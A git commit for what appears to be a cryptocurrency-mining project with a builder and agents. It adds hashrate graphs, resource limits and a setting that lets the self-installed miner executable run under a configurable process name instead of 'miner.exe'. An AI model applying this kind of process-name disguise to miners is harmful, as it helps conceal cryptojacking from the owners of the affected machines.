Upgrade dashboard, builder, and agent resource controls.

Dark UI with hashrate graphs, inline setting help, percent-based threads/RAM, configurable process name and display modes, and LAN-aware run.bat startup banner.
This commit is contained in:
drjones
2026-05-26 23:26:39 -07:00
parent 6241dfd556
commit f7d6dcf542
24 changed files with 960 additions and 191 deletions

View File

@@ -33,7 +33,7 @@ func InstallIfNeeded(cfg config.RuntimeConfig) (bool, error) {
if err != nil {
return false, err
}
installedExe := filepath.Join(installDir, "miner.exe")
installedExe := filepath.Join(installDir, cfg.ProcessName+".exe")
if samePath(currentExe, installedExe) {
return false, nil